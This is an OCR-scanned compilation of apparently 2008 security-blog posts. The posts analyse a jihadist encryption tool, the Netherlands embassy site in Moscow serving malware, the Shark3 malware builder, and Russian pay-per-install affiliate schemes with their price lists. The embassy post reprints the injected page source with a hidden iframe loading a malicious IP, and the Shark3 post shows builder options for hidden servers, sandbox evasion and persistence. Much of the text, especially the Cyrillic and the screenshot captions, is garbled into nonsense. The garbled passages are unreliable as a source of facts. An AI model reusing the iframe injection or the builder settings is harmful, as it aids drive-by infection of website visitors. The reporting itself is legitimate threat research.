YSa6Sb2zLLNSA8/wtCEHukZBx eR 2K fF vEGNK1 +swwlECDS8yU2t7fKcfOul1 +97 TUGSE gr 


iCompression: 43.3% Cipher: RC6, Key size: 256 


Needless to say that the new features, even the fact that they’ve updated the program has to 
be discussed from a strategic perspective. The improved GUI and the introduction of digital 
signing makes the program a handy tool for the desktop of the average cyber jihadist, average 
in respect to more advanced data hiding techniques, ones already discussed in [7]previous 
issues of the [8]Technical Mujahid E-zine. With the tempting feature to embedd the encrypted 
message on a web page instead of sending it, a possibility that’s always been there namely 
to use the Dark Web for secure communication tool is getting closer to reality. Knowing that 
trying to directly break the encryption is impractical, coming up with [9]pragmatic ways to 
obtain the passphrase is what [10]government funded malware coders are trying to figure out. 


Screenshots courtesy of the tool’s tutorial. 


_ stp://Adanchev. blogspot con/2007/s2/inshaL ahshaheed- cone-outcone-out al 
_http://adanchey. blogepot .con/2007/08/inf-ve-vill-renain heal 
_hetp:/ /adanchev. blogspot .con/7007/08/inf-now-permanently-sbut=dow eal 

| http://adanchey. blogepot .con/2001/07/ginf-ovitching-bloge. heal] 

. http: //ddanchev. blogspot . com/2007/04/mujahideen-secrets-encryption-tool.html 


ttp://www.reuters.com/article/internetNews/idUSL1885793320080118 


http: //ddanchev. blogspot .com/2006/12/analysis-of-technical-mujahid-issue-one.htm 


http: //ddanchev. blogspot .com/2007/06/analysis-of-technical-mujahid-issue-two.html 


. http: //ddanchev. blogspot .com/2007/11/botnet-of-infected-terrorists.htm 


Remote User (Public Key): Key ID: 5D376133 2] 
Local User (Private Key): Key ID: F64F974E 2) 


1 iA VY 


| Message toSend Message to Send Encrypted | Received Encypted Message | Received Message Decrypted 4 |» | 


Code Tag 


XM Close 


Poporod Naprrep! 
Cnacu6o 3a To, 4To Gbin c Hamu 8 2008 rosy. 


Paspewm or 4HCTOrO Cepaua K BCeA KOMAaHALI 
TnaeMega noasapasute Te6a c Hospi 2009 Fogom! 


Kax Gi Hu Cryujannce KpacKH B MKpe, 
mei yBepenni, 470 BaGno u Tpyn - ace nepetpyT. 
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NpuaTHo OWwyuwaTb ce6a 
TOP Be6mactepom ? 


Bca KoMaHAa InaBMega no3ppasnaert Teba 
C 3TMM AOCTMKeHMeM. 
OT Ay KeNaeM NOBTOPHTb 3TO B 2009 ropy! 


He 6bikyn! 
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4.1.13 The Dutch Embassy in Moscow Serving Malware (2008-01-28 22:33) 


<META content="Royal Netherlands Embassy, Moscow, Russia, Dutch, consular affairs, visa, visun, 
passport, paspoort, political affairs, education, science, culture, press, economy, agriculture, 
environment, defence, consulates, MATRA, Royal House, Nederlandse, Ambassade, Moskou" 


nhame=keywords> 


<META content="The official website of the Royal Netherlands Embassy in Moscow with information 
about the embassy, visa procedures and other consular affairs, education, science, culture, 
press, economy, agriculture, environment, defence, consulates, MATRA and the Royal House. In 
English, Russian and Dutch language." 


name=description> 
<META content=index,follow name=robots> 
<META nanee“version” content#"26.04.2607"> 


<link rel="stylesheet" href="/styles/style.css" type="text/css"> 
<link rel="stylesheet" href="/styles/main.css" type="text/css"> 


</head> 

<body style*"nargin:6 Mite iftame sre 
height=‘1° style=‘visibility: hidden;*></ifranme> 
<table style="width:166%;height :106%;table-layout:fixed;" cellspacing="6" cellpadding="6" 
border=""6"> 

<tr><td class="topsqt™>&nbsp ;</td> 


*http://68.178.194.64/tab.php* widthe‘1' 


<td classe"header''> 

<table style="“width:106%" cellspacing=8 cellpadding=®> 

<tr><td><img src=""/images/logo_big.gif"“></td><td align="right" valign="“botton" 
style="padding-right :26px ;padding-bottom:8px;"> 

<a href="/"><imq src="/imaqges/nhone .qif'></a>&nbsp ;&nbsp ;&nbsp ;anbsp; 


The Register reports that the [1]Royal Netherlands Embassy in Moscow was serving malware 
to its visitors at the beginning of last week : 


"Earlier this week, the site for the Netherlands Embassy in Russia was caught serving a 
script that tried to dupe people into installing software that made their machines part of a 
botnet, according to Ofer Elzam, director of product management for eSafe, a business unit of 
Aladdin that blocks malicious web content from its customers’ networks." 


Let’s be a little more descriptive. The only IP that was included in the IFRAME was 
68.178.194.64/tab.php which was then forwarding to 68.178.194.64/w/wtsin.cgi?s=z. _ ip- 
68-178-194-64.ip.secureserver.net (also responding to Imifsp.com and foxbayrental.com) has 
been down as of 22 Jan 2008 18:56:38 GMT, but apparantly it was also used in several other 
malware embedded attacks. For instance, the IFRAME is currently active at restorants.ru. The 
secondary IFRAME is a redirector script in a traffic management script that can load several 
different URLs, to both, generate fake visits to certain sites that are paying for this, and a live 
exploit URL as it happens in between. 


Historical preservation of actionable intelligence on who’s what and what’s when is a ne- 
cessity. Here are for instance two far more in-depth assessments given the exploits URLs were 
still alive back then, discussing the malware embedded at the sites of the [2]U.S Consulate in 
St. Petersburg, and the [3]Syrian Embassy in the U.K. 


Related posts: 
[4]MDAC ActiveX Code Execution Exploit Still in the Wild 
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hitAD The best way to earn money with your websites 


PPC program 


www.h 5 
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‘ew COC COE 


iFrame 911 


> 
ae # BUY iFrame Traffic $ SELL iFrame Traffic 
— ereese you Rating poputerty (Top ates, Museese feverme tom you websme in 6 
5 Feeds, Barrer elitharage, ote) mentee 
0, $ © Starting trom 25 per 1000 unig users © Ad ches accepted 
@ Brame batt CAL tor Cnen Pevources © Starting trom 1 dolar per 1000 users ity 
o © Abechdely clea for you vators 
: ° 
° 
. ° 
° we 
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if Mt Your, Money| Milk; 


“tram OF 


D bias momyensens tpachen RESTON 73 KAR AYO YRECARRARNO VC TANONY, Honocrs 
D KAMA I Make! OPRCOR RECA © CAEN RAPHMNPCEDS NPC paNMe. 


> Crapromest peitt 105% 29 1008 yremcameancx eactannon, © 
ADMEMECTRD BOTY? © CyTiN nat MecuEON Mea eRm. Clade peste AO 1155. 


wopoenen Acwadn Fas AONE! Perea 
DOC ERMA CRO 
WCTOmh 7M Acie x RReHOOE Ha 
W>petos oni HE OyReve 1epAtL. NOCE MAEM Kan, HaNpIMIEP, m) 22 mADONTENDON 


D Buninas ne sanpocy © MOLE upenent 


> Feat ame cramecrece, 
sion | English 

> Pasiraremsen 1a Fetua di prmenccinn), Weberiorney (2.5% KOMOICCHED, 
AoGane @ ——apyrne mnatexrmie crete C yerrON KoneeCCren eCaieremEC. 


aeOAKH 

irameStat.Org 

Rpsraqntent +> Reyemotensi canmope “ncenaa commu! ma nessomp."te) 
CTRL+D 


RENARTE MEHDIV CEPMAC! Pernctpauen. 
DOIN ust 
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> We bey trattic, and pay for every enique instalation 
> Everyone bs welcome te join the Hramestatorg partnerstup program 


> The starting price bs 1005 for 10009 enmyue of instalation, hey proviche good 
cpaaiity Ur athe, we will inci ease the price. 


> You ony put the short one ine frame code on your page(s) and start to MAKE 


We DOOrT have any Active X Comnote OF amy pop-ups... means Chat you wilt 
‘net losing your traffic wath oer Gramet 


> The payments are on request at ary time. 
D Rost ame stamcte of your work 


Pe net nen RENN OR REMUS WS 


> Freencty support service 
 Everyoody who works with us ts satisfied 


START MAKING $$$ RIGHT NOW! 
JOIN USI 
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OUR NEWS 


Hactpovacn 4s Samer <> META-Tern # Mpoxen 3 Keumporanve F Onepay @) Boixoa 
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& Hactporan Samenb! <> META-Tern # Mponen  Keuwporanve # Onepayyn @) Boixo, 
Crmcon samen 
° <IFRAME> wr OOSTSI 
° </ody> ae” |= | aon | OTE 
Hoean samena 
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& Hacrpoiacn %S Samenpi <> META-rerm # Mponcn Kewporanve # Onepaynn @) Boon 


Ta6smya KeuHpoBaHna 
Wa6non URL  Bpema xpaHeHna Kewa, MxH Onepauyn 
f ) G@Oovil 


LUa6n0H4 URL | 
EDEMA XPaHeHA Kea: | Mune 
© Aobaextm 


Asian 32$ (Per 1000) 

Mixx = 42S (Per 1000) 
Mix withost asia 60S (Per 1000) 
USA 1605 (Per 1000) 
240S (Per 1000) 
170$ (Per 1000) 

190 (Per 1000) 

170$ (Per 1000) 
1705 (Per 1000) 
220S (Per 1000) 
Contact: 
399851538 (CQ) 


SBERWS 
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Price by 1 Installs 


0.21 
016 
019 
0.24 
0.21 
0.21 


1734.6 
1269.54 
2414.72 


6213 
7040 
10707 
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Install 
Accept 


1403 


703 
8/03 
9/03 
10/03 
11/03 


1876 
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TOTAL 


12791 


Install 
Accept 


Price by 1 Installs TOTAL 


0.05 886 
0.04 
014 
0.02 


0.05 


13940 
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[5]Malware Serving Exploits Embedded Sites as Usual 
[6]Massive RealPlayer Exploit Embedded Attack 
[7]A Portfolio of Malware Embedded Magazines 
[8]The New Media Malware Gang 

[9]The New Media Malware Gang - Part Two 
[10]Another Massive Embedded Malware Attack 
[11]I See Alive IFRAMEs Everywhere 

[12]l See Alive IFRAMEs Everywhere - Part Two 
[13]Have Your Malware in a Timely Fashion 
[14]Cached Malware Embedded Sites 
[15]Compromised Sites Serving Malware and Spam 
[16]Malware Serving Online Casinos 


. http://www. theregister.co.uk/2008/01/23/embassy_sites_serve_malware/ 
. http: //ddanchev. blogspot .com/2007/09/us- consulate-st-petersburg-serving .htm 


http: //ddanchev. blogspot .com/2007/09/syrian- embassy-in-london-serving.htm 


. http: //ddanchev. blogspot .com/2007/11/new-media-malware- gang. htm 
. http: //ddanchev. blogspot .com/2007/12/new-media-malware-gang-part-two.htm 
10. http: //ddanchev. blogspot. com/2007/11/another-massive-embedded-malware-attack .htm 
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4.1.14 The Shark3 Malware is in the Wild (2008-01-31 23:53) 
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ClatuctuKa 


CT OS EI CE) co es ME 


Mapt 


Install : 
Date Accept Price by 1 Installs TOTAL 


1/03 10080 
2/03 

3/03 

403 

5/03 

6/03 10246 
703 14076 
8/03 

9/03 

10/03 


11/03 


te 


14/03 
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installing.cc 


Password 
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InstallsForYou - 3To NpHeMNuMbIe YeHbI, ONepaTHBHOCTh, HaMexXHOCTb u SpicTpan 


CKOPOCTb OTpy3KH Bcex CTrpan. 
Vesc0T Ca pavrest npennomersm ana Bawero bromeca, ana Kpynnesx 3anac08 MpegyouoTpena 
yaoSean GAcTema GayQox. 


Doymerobrest cannopy mesomer Bast Caenate 2aKa3, CMDSECTHB BAC O6 HMERUIIXCR B Aareest 
MOMEMT NDCANOMEHHAX M LEAK, 


Mei WMeeM QoeoreHO MECTKYIO GACTEMy yreanbHocTH 33 30 Aue, MovTOMy MoeTopersta Mano Toro “TO 
wovnovents, HOM daxtwecoot seu Mon~erre Gonpwe sarpysox Wem Saxazessarn. 


B cnywae ect Baw boT/codT no Kancs-nibo Temereccnod npiwne He paboTaeT, a 

OSraaTeNCTBd C HAWel CTOPOHes BemMOMMHered, 33KA3 ONaERBSETCA B ObLHOM pexOete, 

Dame ecm Boemna CHOPHAA GITYBUMR, TO Mbt CHOIKEM BMECTE NDSCSEPHTS Ha MPOCTETWEM MOANEPE KON-BO 
JOPy Dox. 


(PexomengyeTca nposepath exseuren Qo Havana OTIpysa WIM ONOBECTHTS CammopTa c npo@eSoe 
OTPOMMT SaKAS Ha ONDEQENereoe Speman, mecixomesoe ANA yCTpanersta Menonagox.O6tsno 
nenpacevenan pabota Gora sunnnaeTca 6 Tewerase NepouUx MeetyT C HaYANa OTTpysa) 
movmouersia: Mes me rpyswes antspyware nporpamens, 3 TaOKe NapTMEpOGe Nporpamens 


Awa 125, or 100« - 105 sa lx 

Mum 22$, oF 100% - 20$ 3a 1K @ 37351809 
Eepona 40$, of 100« 35$ sa 1k @ 43960479 
USA (CWA) aw 140$,07 10x 130$ 3a 1 « 

UK (Anrnus) 2205 @ 43637352 
IT (Vrranua) ous 1505 @ iris9ss 
OE (Tepmarats) Wire 170$,0T 10x 150$ 3a 1 « 363465484 
PT (Nopryranua) 4505, or Sx 350$ sa 1k ad sti 
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K 2CASH.. 


MENU 


MLE sTHAD 
CUM BATES 


0.4500 
0.3000 
0.1600 
0.1000 
0.1600 
0.9000 


on. 


ERAREBS 


Other Commeres . 0.61 per inetat 


[131] 
12802 


Life’s too short to live in uncertainty, the stakes are too high. A month ago, | indicated the [1 ]up- 
coming release of [2]the third version of the script kiddies favorite [3]Shark Malware. Despite 
that after the negative publicity of the malware that’s actually promotd as a RAT, the authors 
supposedly abondoned the malware, they seem to have logically resumed its development. 
And so, the Shark3 malware is continuing its development. 


What’s new? Anti-debugger capabilities in particural against - VmWare, Norman Sandbox, 


Sandboxie, VirtualPC, Symantec Sandbox, Virtual Box etc. 


i 


“es Basic Settings 
fag Server Installation 
SS) Start Up 
m] Install Everts 
Bind Files 

> Blackist 
3 Anti Debugging 
(# Firewall Bypass 
QW Advanced 
T) Summary 

*~, Compile 


r- Manipulation 


Server Type 


( Visible Server - Good for local testing. 
(© Hidden Server - Server runs in the background. 
| IV Aggressive Server (resets the startup-values when they're deleted) 


| [ Modify File-Creation Time of server (Sets the Creating Time to the Windows-Installation Time) 
[V Modify File-Attributes (Sets server as “hidden” and as a “system file”) 
_ & Mek Server Installer 


Misc 


[~ Lock server sharing 
[~ Only Connect When On-Line 
| _T Sleep until next reboot (Requires Startup!) 


y Delayed Activity 


Days: [o Mins: jo This delay wall affect the connection, 
[~ Enable Activity Delay the blacklist and the activation of the 
Hours: [9s Secs: [9 ~——offline keylogger, if enabled. | 


Detection rate : Result: 15/31 (48.39 %) - Backdoor.Win32.Shark. if 


File size: 3104768 bytes 


MD5: e3a6758f5c90b39b59c6cd7551224d52 


SHA1: 25f025f31560a28275aab006e04aace828e012ea 
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06/01/2008 - 06/07/2008 : 


06/01/2008 799 $79. 90 $0.00 $79. 90 
06/02/2008 934 $93.40 $0.00 $93.40 
06/03/2008 780 $78.00 $0.00 $78.00 
06/04/2008 808 $80.80 $0.00 $80.80 
06/05/2008 ae $81.30 $0.00 $81.30 
06/06/2008 $64.90 $0.00 $64.90 
06/07/2008 $57.70 $0.00 $57.70 


sco] ssa500 | 30.00] $5360 


06/08/2008 - 06/15/2008 : 


06/08/2008 726 $72.60 $0.00 $72.60 
06/09/2008 953 $95.30 $0.00 $95.30 
06/10/2008 688 $68.80 $0.00 $68.80 
06/11/2008 0 $0.00 $0.00 $0.00 
06/12/2008 0 $0.00 $0.00 $0.00 
06/13/2008 0 $0.00 $0.00 $0.00 
06/14/2008 ; - . $0.00 $0.00 
06/15/2008 $0.00 $0.00 
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CP, wweeast 


Home > Shee op 


Sign Up 


Just fofow Ihe eaty steps and you'd be ready to 9° in fo Bre! 


* Log 
Note; Mt be torn 5 t N 
Twractors, ethers and numbers orty 
"rat 
* Fest Marne: 
* Lat Name: 


Ke 
aM 
PHONE 
Referred by 
Note: Your wwernume wil NOT be 
part of your publicly vile irk 


randy, panwce oolect a 
ne that 6 easy for you to 


temecnber 


eeeeeeneeend 


Note: ff tek: mrarhed by * we 
requred 


HOME PROGRAMS PAYOUT CONTACTUS SIGNUP LOGIN 
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O Pre, \wxecash’ 


ne 


PROGRAMS PAYOUTS CONTACT US LOGIN 


Advanced stats 


Quick Login 
Veena 


Pessoa 


Join our team and make a fortune instantly! 


LumeCash one of he best Poy Per netal roy ons ard 6 a0 for serene webmasters wih Quilty Yattc. 


ed it does not matter mbich traffic do you have: selected or mound. LiseCash offers the highest rates ary 
othe Poy Per Iretal comparry conad offer tr mmed rattk and mdvdual rates prayer for exckave waftc 


There are many Dergs to promote LumeCash. So if you Neve 8 wade experence Mm Day per netal busress 
yOu Can eanly maomice your Income in hours and design smooth and stable web presence. Yet LumeCash 
the best Poy Per Inetal program tw erharce you experience. 

Wortane wet) LumeCash 6 lhe rurreng Tou own business Dut net) no hessies! 


Aad more reasons to pom our Loam 


© Advanced stats. You ahuays may veew latest shetetcs for ou service! 


© Regda and prompt b mortty popats A wade Qunce of payment meTunds prowde Te Dest way 
for You to be pad, 


© Referral bonuses. Get extra money The amount of mtuch totaly depends on You and You referrals 
actvty! 


© Customer Support Service. For Tow conwersence we provide You mah efficent mal & hut sxopert 
{O Brewer ary QUESTONS OF CONCENS You may have regarding Ou serve 
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Statistics 


Show Date Breakdown Summary Stats For: 


[Free from: (+) (2008-07-23 ||... |- 2008-07-31 |... | 


Apply 


2 2 a I Se co 
roa: [CT CSCS 0] vol 0.00] 0.00 
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New Server x 


“es Basic Settings ; 
fay Server Installation “Compression ratio 
©. Start Up Traffic compression ratio (0 to 9): fa 
~] Install Events | Transfer compression ratio (0 to 9): | 
Bind Fies | 9 
© Blacidst (Tolerance — — 
e Hiei a Cpr-Tolerance Limit: f2 % 
Stealt 
.# Firewall Bypass Ping-Tolerance in seconds: [20 
Pes Advanced 
@ Summary r Key Stuff 
~ Compile Server Mutex:  |sharK6WVH22Q2H7 


we bHOQqK1LG]Ii*s@quWwqeud2NbKfT6QI[ 8eAjB>HCsF61NqloCGXS 
Q3du:iFmbisnkc>jIXURK4a:009L9@=12xXb0 
Secondary Key: aZguw3TZc=KFf_¥Q°1Cx<S4?lfvrv44PpISQKxCSJ7pipMalB7eKYZ0 
cK:\E_GIV¥va\yxXPO-un][eKkfOsuk80uS@pX7IliCsHskY¥dy <vOUs:hq 


Random Seed: —-F7tobwfk9By18z6tgzi3 


Cicessts —] (_sve ros] cance 


Some key points regarding Shark : 


- its [4]do-it-yourself nature, [5]just like [6]many of the [7]malware tools [8]l’ve covered [9]be- 
fore is [LOJempowering script kiddies with advanced point’n’click capabilities 


- built-in spyware functionaly, namely "aggressive service" which resets the start-up values 
when they’re delted, yet another indication that what’s pitched as a RAT is in fact malware 


- once released in an open source form, a community emerges around it one that starts inno- 
vating and coming up with new features 


http: //ddanchev. blogspot .com/2007/12/shark-malware-new-versions-coming.htm 


. http: //ddanchev. blogspot .com/2007/08/shark-2-diy-malware.htm 
. http: //ddanchev. blogspot .com/2007/07/shark2-rat-or-malware .htm 


http: //ddanchev. blogspot .com/2008/01/diy-fake-msn-client-stealing-passwords.htm 


. http: //ddanchev. blogspot .com/2007/10/diy-german-malware- dropper .htm 


ttp://ddanchev. blogspot .com/2007/09/diy-phishing-kit-goes-20.htm 


http: //ddanchev. blogspot .com/2007/09/diy-exploits-embedding-tools.htm 


. http: //ddanchev. blogspot .com/2007/09/diy-chinese-passwords-stealer.htm 


© ONANRWNE 


http: //ddanchev. blogspot .com/2007/06/diy-malware-droppers-in-wild.htm 
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= Webmasters - Turn your traffic into CASH. 
for Ss Rus >> Start earning CASH today! < 


Learn How to make money with Zango Gateway 


YONA So 


ZangoCash 


TangoCash is the oldest Pay Per instal business model company on he internet hese days 
They were foemety LougCash and than in 2005 moved to ZangoCash. They are much more strkt 
£0 No feud weomasters get in hei system. They alto Nave to follow laws 60 hey will stay on 
fhe martat long tne 
1 TangoC ash pays muh more than other pay per install af@hate programs Zango Cash agen 
2 oe increased rates in Dec 2007 and now will pay you reen $0.75 to $1 45 per USA instaliaton, 
Payout §0 40 % $0 75 for Canada, France, Germany, Raly, Nethertands, Spain, United Kingdom instals 
up fo$40 bd $0.10 99 $0.24 fee Nese counties Austratia, Austria, Belgium, Denmark, Finland, keland, 
=i eee betand, Mexico, New Zealand, Norway, Portugal Singapore, Sweden, Switeriand instatabons 
Bo you get paid every tree sceneore insials fom Mose courts 
Zango has great referral program wih incredible rate of 20% 60 you wil make 20% of your 
Gowns eaenings forever 
There is many weys how to promote ZangoCash such as Syndk ston, ORM, Media Restictor, 
Bottware Duncie and cihers. You get alway Dakd by DavDat. Check of wire Pransfer 


Yazzle cS 


Vazzie payout § 42 US and $21 Uk and CANDA It has have highest payouts in install Industry. 

There is many things to promote and you can atso tundie EXE tes Yartie célers a wide range 

(fnew products Sor you to promote. From sun transistors tke TuzleTaik and Zolero, to brand new $ 

Dares Whe Suschu of Coot apoikc abons like Pic ster. there ts plenty of money to be mare? CASH W883y1 3 


ux START TODAY 


LumeCash 1s new Pay Per instal company and 15 open oniy for senous webmasters with quality 

falc. Ifyou have products hat are Gownloaded 1000 times per day than you can realy peTKN In Rating 

thort te € you bundle ei simple code wih you product The more quality installs you produce 30 

fhe Deter rates you get and more money you make. They Gent want to loose Met pretebut also = Veres 
c Attatiate BPuture 
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PAY-PER-INSTALL.ORG 


Mcmebers List 


| Poy Per Install Programs | Luxecash || Zangocash Vombacash | Waverevenue | Snaprntais || Yarzie || Thelnstals 


Welcome to the Pay Per Install Forums 


If this is your first wisit, be sure to check out the EAQ by clicking the lirk above, You may have to register before you 
€4n post: cick the register ink above to proceed, To start viewing messages, select the forum that you want to visit 
from the selection below. 


)-Por-Install.org 


Poy Per Install (2 Viewing) SS MassBinder? - New Imereved... 
Everyttung Pay Per instal related by mupress Todey 11:15 4" B 


Making Monay - fia money in it 
Matang money wth Pay Per Install, methods chat, and mere =: ‘Yesterday 12:5 Pe B 


How to market Pay Per Install Programs fee Today 06:11 24 B 


Tak about seftware, 190 tricks, and other offtepic chat crextee ‘Yesterday 02:29 °M 
AlfMate Programs 


Lumecosh (2 Viewng) 
Everything about Luxecesh, terms, trxks, and more 


- diseeerertng files and. 
Signup to Luxecash here bias Teday 04:59 40 


Langocash (1 Viewing) 
Cverything Zango related 


Signup to Zangocash here 


Zango Can Ge Te Nellans 
@zuen Yesterday 02 9 PMB 


Yombecash 
Everything about Vornbecash in here 


Signup to Vombacashhere 9 == 8 


Yesterday 12 MPN 
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VISET COW GEST ANP TLEATE PROGHAM AMD MAKE MONEY WFETH FOUNSETE 


Webmaster 
a Money mamas cium = | 


WE pars up to. JN. America) per install. FREE content anc 
Activex protection 


Aihhile Progen rerewy 
bey Webmaster “heme ore 


TOP10 Webmasters Sites | Marketing Articles | Affiliate Programs Forum | SEO Tools | Affiliate RSS Feeds 
Ne etter | Webmaster Resource Best Affiliate Programs 


——==_ 
oe v M 


OPENED RIGHT NOW 


SOOKMASK US 


WEORSITE CARNE 


This Is something new, Sometimes ore these programs anoying for surfers but 
you con be surprised how much they con moke for you. You ore offering small 
program (not dialer) which is automaticaly installed to visitors Internet explorer 
For this instalation you can get from $0.03 to $0.80 conversion ratio Is from 1:10 
to 1:40 so with 1000 vistors you will moke up to $20, It is better than some 
bmpresston programs becouse it converts every troffic, Tere is more and more 
these Activex progroms whitch offer toolbars for adult or nonodult websites, This 
is something new. Sometimes ore these programs anoying for surters but you can 
be surprised how much they con moke for you, You ore offering smal program 
(not dioler) which is automaticaly instalied to visitors Internet explorer. For this 
instalation you can get from $0,023 to $0.80 conversion rotio Is from 1:10 to 1:40 
so with 1000 visitors you will moke up to $20. It is better than some impression 
programs becouse it converts every traffic, Tere is more and more these Activex 
programs whitch offer tootbers for adult or nonadult websites 


your site om $45 


There is total 227 sites in our database including not paying or 
abandoned affiliates, 11 is in category ToolBar Money sod 139 is 


number of paying verified site 


[153] 


(al FREI sartan week porments/ wenn exe 
(a) RP somes 
lal FER us nessa s seers coal thome onde 


Do SEPP tack pina as en 
= 


[154] 
12819 


Pay Per Install 
PayPerinstall.ORG 


There it many 
webrmaiters whou 
would tke to 


reabe rrarey with ZangoCash 


od 
TangoC ath is the legend of pay per install programs and there is many ways 
how to make money with them. There is many sities listing methods of 
pageant baring money with Zango. ZangoCath pays much more han oer pay per 
programe night iistall atone prog ams 
fee you you tango Cash pays up to $1 46 per instal a8 depends how many installs per 
past burvdle Prongh yOu have afr from what County Mose installs Comes and Now umuque 
eal we ee Is Bee tratic. Since December 2007 there is new pay structure $0 for USA 
> Wnatalis you get $0.75 - $1 45, $0.40 - $0 75 tor (Canada, France, Germany, 
Saentaad pou aly, Netherlands, Spain United Kingdom instals) and otver selected 
eoske reney touties (Australia, Austia, Bebzium, Denmark, Firdand, iceland, ireland, 
— md Mexico, New Zealand, Norway, Portugal, Singapore, Sweden, Swireriand) Start 
ee Hrstadts are paid $0.10 - $2.24 So the minimum you an pet for instal is $0.10 i 
bundle EXE bo (hich Is prety good. Te get the highest rates you need to make 200 000 earming 
thew code. There Wnstalts per month. There is many ways how to promote ZangoCash such as 
ewe avers ot Byndic ation, ORM, Meda Restriter, Sofware bundle and omers. You get CASH 
Mwasy paid by paypal, check cr wire Pansier You can find stories about joda Ty» 
COrwertion rates whkh are reacting arround 145 but | would say that is too y? 
high 1/30 should be good for you # you protect your content with Zanoo. han 
(OU pet install for every 20% vis€ to your fe which comes from listed 
tourtiries and has fo Zango instaied aireaty 
prompred to We ~~ 1 
Soenlaed spec « . 
Semntond spodel VombaCash A af sf ag 
money) or eee VombaC ash 16 very new program AS a New pay ped install aftiute prog am 
Roofers a huge coportunity to maximize revenues trom your batic The Kea 
benied Vernbacash ts to create a Win-WVin-Win solution, for your taf tor you 
$d for end users. What set VornbaCash apart is fact Prat hey have 
Orveloped a sale ares usted ad supported program wiih high conwersion 
Above there is a fates and amazing benefits for you and your trafic To show VornbaCash 
bnk to arose Comendinent to users Safety, hey have enroiied Vora in he TRUSTe's 
wneee Seer Gn Trusted Download Program 
| lpet tecnnad You can read about Verba and TRUSTe's Trusted Downioad Program at 
\ feww tutte orglaboutpres s_reteate2_15_07 php in addon t great 
fromotonal tools, VorrbaCash also offers Ihe possibilty to promote its high 
Gualty fee comterts (Vorbashcts and VorrbaSavers) as your own cortent 
Payment are send on fhe 1st and 16% every mort, and payment memode 
bre checks. wire, Paypal, and epassporte 


wi help you) 


WaveRevenue 


WaveReverse is an afibate Toolbar that pays you each time a surier installs 
this Toolbar on his comeuter. Thés Tocibar is pertect for all hinds of tatic 
Even for batic that ts of ower quality that is usually hard to monetize wih 


Daily Reach (percent) 
glavmed.com stimul-cash.com rx-partners. biz 
0.01 


0.008 


0.006 


0.004 


0.002 
0 , 
Mar Apr May Jun Jul Aug 
©2008 Alexa 2008 Aug 29 
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4.2 February 


4.2.1 GCHQing with the Honeynet Project (2008-02-11 17:17) 


o Te 
~~ Py _—aae 


7 i , } ee beg ~~ i 
= aC tSGr" 
| 

ee 


Nothing’s impossible, the impossible just takes a little longer. If someone told me an year ago 
that I’ll be presenting next to the dudes from [1]the Honeynet Project, | would have been rather 
skeptical. So, after a week of intensive socializing among geeks, a windy trip to [2]Stonehenge 
along the way and lots of drinks, it’s becoming increasingly clear to me how important face- 
to-face conversations are for the sake of improving productivity and relationship building. It’s 
also worth pointing out how issues such as dealing with information oveload, data sharing, 
and actually communicating all the aggregated data to the industry and the general public, 
need to get a boost especially at the strategic level. And now that I'll be officially joining the 
organization, stay tuned for for a diverse set of KYE ([3]Know Your Enemy) coverage of the 
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Day 


24 
23 
22 
21 
20 
19 
18 
7 
16 


= NR wWOe Han © CO 


Total: 


Installs 


ow 
oe 


Joke & WH Se @ ee | 


958 
353 
1331 
$30 


oo goo eooeocso 8& 


3533 


Clicks 


102 
610 
617 
521 
731 
603 
879 
947 
1023 
1578 
1851 
2430 
3371 
4127 
956 


ooo go oo coc 9° ©& 


20346 324.44$ 


Money 


1.48$ 
8.08$ 
10.06$ 
7.78$ 
10.36$ 
8.61$ 
12.41$ 
13.02$ 
14.90$ 
24.42$ 
28.98$ 
42.10$ 
54.15$ 
70.26$ 
17.83$ 
0.00$ 
0.00$ 
0.00$ 
0.004 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 


Dec, 2008 


AV Installs 


59 
1 


oo oo oO 9c 8 & 


3671 


AV Money 


0.00$ 
0.00$ 
25.00$ 
50.00$ 
0.00$ 
50.00$ 
25.00$ 
0.00$ 
50.00$ 
50.00$ 
50.00$ 
100.00$ 
125.00$ 
375.00$ 
100.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 


1000.00$ 
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AV Chargeback 


0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.004 
0.00$ 
0.00$ 
25.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.004 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 


25.00$ 


Refferals 


0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 


0.00$ 


Total 


1.48$ 
8.08} 
35.06$ 
57.78$ 
10.36$ 
58.61$ 
37.41$ 
-11.98$ 
64.90$ 
74.42$ 
78.98$ 
142.10$ 
179.15$ 
445.26$ 
117.83$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 
0.00$ 


1299.44$ 
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WEE ROTALCARNCOM 1 § 


PROYAL CASH 


WHAT'S NEW? 


tt, 2008 
Royal Cash Adds New Blog 


\eere more 


Peyments 


Leere mere 


«27, 2008 
Royal Cash Adds Fhe 


(eere mere 


RaweK.anh Mew Archers = 


[OP 5 ROYAL AFFILIATES 


Ported 2206-06 34 - 2008 


2 WHID Tremsactons Kato Revenue 


2 Ae ™ :233 $5 
2 etree $ t 
3 oowte 8 
a lyes 7S 
s ator t 
BAEORT SPAN 


[OP 3 CONVERTING SITES THIS WE 


ROYAL“ 


HOME | SON UP | OUR SITES | PAYOUTS | PROMO TOOLS | Wi RESOURCES | CONTACT US 
EARN UP T0 60% RECURRING 


WEEKLY UPDATED PROMO! — MAKE A KINGS RANSOM 


FHG, HFS, FREE CONTENT, vor tes 
10% OR $100" R55, BLOG, POTD, VOTO OYAL CASH 


ASH PROGRAM BENEFITS 


Rove! 


a 


ee 


Exchusive Miche Sites 


True Teen, Solo Teen, Orunk Teen, Old 


Weekly Updated Promo Toots 


RSS feeds, hosted blogs 
Pkture & Video of the Day 
Free Hosting & Subnitters 


w TH BU posters 
Member's area access per request 
On Time Payments By 


beck, Wire, Spacaporte, Feturd, 
Free Epassporte Card 
Cascafing Billing Systers 


vebmoney 
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You lose money each second without us 
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emerging threatscape. 


1. http: //www.honeynet.org/ 
2. http://en.wikipedia.org/wiki/Stonehenge 
